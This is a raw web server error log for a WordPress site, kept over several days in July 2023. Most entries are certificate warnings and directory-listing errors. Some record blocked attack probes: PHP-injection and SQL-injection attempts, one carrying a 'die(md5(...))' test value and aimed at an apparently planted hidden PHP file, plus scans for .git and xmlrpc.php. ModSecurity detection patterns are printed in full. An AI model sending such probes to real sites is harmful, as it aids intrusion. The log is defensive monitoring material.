Jul 05 03:20:48.854792 2023] [ssl:warn] [pid 16882:tid 140686472267648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 05 04:20:02.343270 2023] [:error] [pid 16908:tid 140686150039296] [client 212.142.140.81:48438] [client 212.142.140.81] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:index[]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: call_user_func found within ARGS:index[]: call_user_func"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-include.php"] [unique_id "ZKU1woWAgaA8GNsg28tMFwAAAEg"], referer: investigacionperu.com [Wed Jul 05 07:02:21.218772 2023] [:error] [pid 16909:tid 140686015756032] [client 13.114.106.30:56406] [client 13.114.106.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:index[]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: call_user_func found within ARGS:index[]: call_user_func"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-include.php"] [unique_id "ZKVbzfDMtc735TpZhrSlGgAAAJg"], referer: investigacionperu.com [Wed Jul 05 10:01:15.741652 2023] [autoindex:error] [pid 16909:tid 140686192002816] [client 103.83.81.183:37300] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com//wp-admin/css/colors/coffee/index.php [Thu Jul 06 01:03:48.927432 2023] [ssl:warn] [pid 1017:tid 140271276803968] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 06 01:03:53.699680 2023] [ssl:warn] [pid 1619:tid 140271276803968] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 06 01:07:48.493454 2023] [ssl:warn] [pid 2995:tid 139822427649920] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 06 01:07:54.850628 2023] [ssl:warn] [pid 3012:tid 139822427649920] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 06 01:08:13.337599 2023] [ssl:warn] [pid 8333:tid 140144793020288] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 06 01:08:21.622352 2023] [ssl:warn] [pid 8347:tid 140144793020288] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 06 03:25:23.093379 2023] [ssl:warn] [pid 31693:tid 140668260272000] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 06 03:25:31.418851 2023] [ssl:warn] [pid 31697:tid 140668260272000] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 06 03:25:31.832851 2023] [ssl:warn] [pid 31697:tid 140668260272000] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 06 03:25:33.845795 2023] [ssl:warn] [pid 31697:tid 140668260272000] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 06 03:25:44.494549 2023] [ssl:warn] [pid 32253:tid 140073238009728] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 06 03:25:53.114815 2023] [ssl:warn] [pid 32257:tid 140073238009728] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 06 09:58:51.965939 2023] [autoindex:error] [pid 32360:tid 140072884061952] [client 103.83.81.183:55120] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com//wp-admin/css/colors/coffee/index.php 2023/07/06 14:20:46 [error] 31995#31995: *34994 access forbidden by rule, client: 36.70.186.17, server: mail.investigacionperu.com, request: "GET /.git/ HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/06 14:20:47 [error] 31995#31995: *34996 access forbidden by rule, client: 36.70.186.17, server: mail.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "mail.investigacionperu.com" [Thu Jul 06 22:02:27.326095 2023] [ssl:warn] [pid 32257:tid 140073238009728] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 06 22:02:59.232354 2023] [ssl:warn] [pid 32257:tid 140073238009728] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 06 23:26:16.537152 2023] [autoindex:error] [pid 7145:tid 140072808527616] [client 172.104.77.164:56188] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2023/07/07 03:40:32 [error] 31996#31996: *73117 connect() failed (111: Connection refused) while connecting to upstream, client: 198.199.72.26, server: investigacionperu.com, request: "POST /wp-cron.php?doing_wp_cron=1688719232.2217299938201904296875 HTTP/1.1", upstream: "http://198.199.72.26:8181/wp-cron.php?doing_wp_cron=1688719232.2217299938201904296875", host: "investigacionperu.com", referrer: "https://investigacionperu.com/wp-cron.php?doing_wp_cron=1688719232.2217299938201904296875" [Fri Jul 07 03:40:33.105153 2023] [ssl:warn] [pid 7202:tid 139979084384128] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 07 03:40:37.440285 2023] [ssl:warn] [pid 7205:tid 139979084384128] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 07 03:40:37.695315 2023] [ssl:warn] [pid 7205:tid 139979084384128] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 07 03:40:40.147741 2023] [ssl:warn] [pid 7205:tid 139979084384128] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 07 03:40:42.415484 2023] [ssl:warn] [pid 7620:tid 140555587716992] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 07 03:40:48.765982 2023] [ssl:warn] [pid 7622:tid 140555587716992] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 07 06:05:32.934571 2023] [autoindex:error] [pid 7644:tid 140555379795712] [client 4.151.4.213:51450] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Jul 07 07:55:21.728738 2023] [:error] [pid 7644:tid 140555396581120] [client 51.255.196.88:57324] [client 51.255.196.88] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:index[]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: call_user_func found within ARGS:index[]: call_user_func"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-include.php"] [unique_id "ZKgLOUIH1AL9Vmplj4J7rQAAAIE"], referer: investigacionperu.com [Fri Jul 07 08:07:42.852802 2023] [:error] [pid 7643:tid 140555128325888] [client 178.128.126.187:57874] [client 178.128.126.187] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:index[]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: call_user_func found within ARGS:index[]: call_user_func"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-include.php"] [unique_id "ZKgOHolO36VKBzNoZiRAuQAAAFg"], referer: investigacionperu.com [Fri Jul 07 11:20:36.555306 2023] [autoindex:error] [pid 7737:tid 140555212252928] [client 139.162.104.75:40108] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Jul 08 03:36:29.834223 2023] [ssl:warn] [pid 23171:tid 140411957114752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 08 03:36:34.066803 2023] [ssl:warn] [pid 23175:tid 140411957114752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 08 03:36:34.783032 2023] [ssl:warn] [pid 23175:tid 140411957114752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 08 03:36:36.909697 2023] [ssl:warn] [pid 23175:tid 140411957114752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 08 03:36:39.187279 2023] [ssl:warn] [pid 23824:tid 140259589629824] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 08 03:36:43.557191 2023] [ssl:warn] [pid 23826:tid 140259589629824] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 08 16:43:20.297825 2023] [ssl:warn] [pid 23826:tid 140259589629824] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 08 19:03:15.238491 2023] [ssl:warn] [pid 23826:tid 140259589629824] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 08 22:33:16.933776 2023] [ssl:warn] [pid 1017:tid 139718282381184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 08 22:33:21.729743 2023] [ssl:warn] [pid 1711:tid 139718282381184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 09 03:35:20.628935 2023] [ssl:warn] [pid 29574:tid 140304248694656] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 09 03:35:32.460181 2023] [ssl:warn] [pid 29578:tid 140304248694656] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 09 03:35:32.845159 2023] [ssl:warn] [pid 29578:tid 140304248694656] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 09 03:35:34.629574 2023] [ssl:warn] [pid 29578:tid 140304248694656] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 09 03:35:36.874903 2023] [ssl:warn] [pid 30053:tid 140330132858752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 09 03:35:42.639754 2023] [ssl:warn] [pid 30056:tid 140330132858752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 09 19:03:24.359126 2023] [ssl:warn] [pid 30056:tid 140330132858752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 09 19:04:30.539254 2023] [autoindex:error] [pid 9360:tid 140329751615232] [client 40.77.87.206:34352] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Jul 10 03:30:24.045924 2023] [ssl:warn] [pid 11111:tid 140205669533568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 10 03:30:30.445154 2023] [ssl:warn] [pid 11112:tid 140205669533568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 10 03:30:30.975261 2023] [ssl:warn] [pid 11112:tid 140205669533568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 10 03:30:32.802174 2023] [ssl:warn] [pid 11112:tid 140205669533568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 10 03:30:35.241459 2023] [ssl:warn] [pid 11613:tid 139925176768384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 10 03:30:39.581586 2023] [ssl:warn] [pid 11614:tid 139925176768384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 10 14:57:08.294974 2023] [autoindex:error] [pid 11863:tid 139924977239808] [client 20.118.167.149:44322] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Jul 11 03:16:17.938200 2023] [ssl:warn] [pid 24597:tid 139730917480320] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 11 03:16:22.208822 2023] [ssl:warn] [pid 24611:tid 139730917480320] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 11 03:16:22.648516 2023] [ssl:warn] [pid 24611:tid 139730917480320] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 11 03:16:24.359218 2023] [ssl:warn] [pid 24611:tid 139730917480320] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 11 03:16:27.959736 2023] [ssl:warn] [pid 25098:tid 140460549617536] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 11 03:16:34.420037 2023] [ssl:warn] [pid 25116:tid 140460549617536] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 11 12:45:44.847843 2023] [autoindex:error] [pid 25237:tid 140460152530688] [client 4.151.4.200:51896] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Jul 11 18:18:00.275780 2023] [autoindex:error] [pid 25237:tid 140460211279616] [client 209.74.104.219:43364] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/plugins/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/languages/plugins/index.php [Tue Jul 11 18:18:03.159828 2023] [autoindex:error] [pid 25237:tid 140460186101504] [client 209.74.104.219:43376] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/plugins/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/languages/plugins/index.php [Tue Jul 11 22:38:22.076545 2023] [:error] [pid 25237:tid 140460228065024] [client 5.188.62.26:58666] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZK4gLktNbIn0iaCWOMLFwwAAAMg"] [Tue Jul 11 22:38:24.684432 2023] [:error] [pid 18082:tid 140460102174464] [client 189.112.223.97:58668] [client 189.112.223.97] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZK4gMKmmlnaBJqQKUHiXIgAAARc"] [Wed Jul 12 03:27:23.100622 2023] [ssl:warn] [pid 7243:tid 139811827726208] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 12 03:27:27.549401 2023] [ssl:warn] [pid 7246:tid 139811827726208] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 12 03:27:28.105813 2023] [ssl:warn] [pid 7246:tid 139811827726208] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 12 03:27:29.749498 2023] [ssl:warn] [pid 7246:tid 139811827726208] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 12 03:27:32.027148 2023] [ssl:warn] [pid 7664:tid 139842230183808] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 12 03:27:34.211338 2023] [ssl:warn] [pid 7665:tid 139842230183808] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 12 03:27:34.908422 2023] [ssl:warn] [pid 7665:tid 139842230183808] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 12 04:38:41.681835 2023] [:error] [pid 7830:tid 139841997084416] [client 162.144.85.198:53954] [client 162.144.85.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:custom_ajax_action. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:custom_ajax_action: die(md5(4565462));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/uploads/typehub/custom/tnromale/.tnromale.php"] [unique_id "ZK50oYbdOvzOZmOTfM2VGQAAAMY"], referer: investigacionperu.com [Wed Jul 12 04:52:34.761234 2023] [autoindex:error] [pid 8569:tid 139841895384832] [client 50.116.0.64:54858] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Jul 12 10:44:35.821606 2023] [:error] [pid 8569:tid 139841886992128] [client 104.248.1.96:45672] [client 104.248.1.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:index[]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: call_user_func found within ARGS:index[]: call_user_func"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-include.php"] [unique_id "ZK7KY2Nx2McyncODI_e_cwAAAAs"], referer: investigacionperu.com [Thu Jul 13 03:47:23.057468 2023] [ssl:warn] [pid 1592:tid 140637412116352] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 13 03:47:27.382662 2023] [ssl:warn] [pid 1599:tid 140637412116352] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 13 03:47:27.893010 2023] [ssl:warn] [pid 1599:tid 140637412116352] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 13 03:47:29.412579 2023] [ssl:warn] [pid 1599:tid 140637412116352] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 13 03:47:31.741567 2023] [ssl:warn] [pid 2016:tid 140256177063808] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 13 03:47:36.086350 2023] [ssl:warn] [pid 2017:tid 140256177063808] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 13 07:04:31.815233 2023] [autoindex:error] [pid 2037:tid 140255780861696] [client 104.214.58.139:55020] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Jul 13 15:56:20.222683 2023] [ssl:warn] [pid 24212:tid 140115534112640] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 13 15:56:26.654627 2023] [ssl:warn] [pid 24229:tid 140115534112640] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 13 15:56:27.148691 2023] [ssl:warn] [pid 24229:tid 140115534112640] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 13 15:56:29.458651 2023] [ssl:warn] [pid 24229:tid 140115534112640] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 13 15:56:31.889627 2023] [ssl:warn] [pid 24689:tid 139918200645504] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 13 15:56:36.427899 2023] [ssl:warn] [pid 24699:tid 139918200645504] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 14 03:46:17.180716 2023] [ssl:warn] [pid 22432:tid 140145104213888] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 14 03:46:21.485140 2023] [ssl:warn] [pid 22434:tid 140145104213888] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 14 03:46:21.984682 2023] [ssl:warn] [pid 22434:tid 140145104213888] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 14 03:46:23.611795 2023] [ssl:warn] [pid 22434:tid 140145104213888] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 14 03:46:25.896423 2023] [ssl:warn] [pid 22858:tid 140066335827840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 14 03:46:30.214495 2023] [ssl:warn] [pid 22861:tid 140066335827840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 14 03:46:30.900797 2023] [ssl:warn] [pid 22861:tid 140066335827840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 14 11:32:40.031784 2023] [autoindex:error] [pid 23738:tid 140066038990592] [client 52.172.253.0:46210] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex 